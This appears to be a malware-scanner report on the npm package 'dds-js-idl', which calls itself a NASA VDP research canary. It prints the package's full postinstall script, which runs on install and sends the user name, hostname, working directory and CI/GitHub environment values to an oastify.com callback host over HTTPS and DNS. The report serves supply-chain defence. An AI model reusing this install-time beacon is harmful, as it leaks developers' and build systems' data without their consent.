// npm 패키지
dds-js-idl
Security research canary — NASA VDP
버전
2
메인테이너
1
최초 publish
2026-05-23
publisher
l0bo
tarball
1,029 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-23
// exfil path
what is read → where it shipssteals
- ○ home dir
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const { execSync } = require('child_process');
> const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
> try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
> hostname: os.hostname(),
> https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});// publisher 캠페인by l0bo
이 계정에서 catch된 패키지 2건고립된 catch가 아닙니다. 동일 publisher가 1개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @1.0.1· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
- @1.0.1··AUTO-PUBLISHED·publisher: l0boheuristic 75/100static flags 5llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:4dsuspicious-description:security-researchosv-flagged:MAL-2026-4264reads-env-varsreads-homedirreads-system-infooast-callback-domainchild-process-spawn
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
// offending code· 1 file flaggedpatterns: 5
--- install scripts --- ### postinstall node postinstall.js --- package/postinstall.js (excerpt) --- const https = require('https'); const os = require('os'); const { execSync } = require('child_process'); const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com'; function get(cmd) { try { return execSync(cmd, { timeout: 3000 }).toString().trim(); } catch { return 'error'; } } const payload = { whoami: get('whoami'), hostname: os.hostname(), platform: os.platform(), cwd: process.cwd(), ci: process.env.CI || '', github: process.env.GITHUB_REPOSITORY || '', node_env: process.env.NODE_ENV || '', }; const path = '/beacon?' + new URLSearchParams(payload).toString(); https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {}); require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {}); --- package.json (entry) --- { "name": "dds-js-idl", "version": "1.0.1", "description": "Security research canary — NASA VDP", "scripts": { "postinstall": "node postinstall.js" }, "main": "postinstall.js", "bin": { "dds-js-idl": "postinstall.js" } } --- postinstall.js (entry) --- const https = require('https'); const os = require('os'); const { execSync } = require('child_process'); const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com'; function get(cmd) { try { return execSync(cmd, { timeout: 3000 }).toString().trim(); } catch { return 'error'; } } const payload = { whoami: get('whoami'), hostname: os.hostname(), platform: os.platform(), cwd: process.cwd(), ci: process.env.CI || '', github: process.env.GITHUB_REPOSITORY || '', node_env: process.env.NODE_ENV || '', }; const path = '/beacon?' + new URLSearchParams(payload).toString(); https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {}); require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
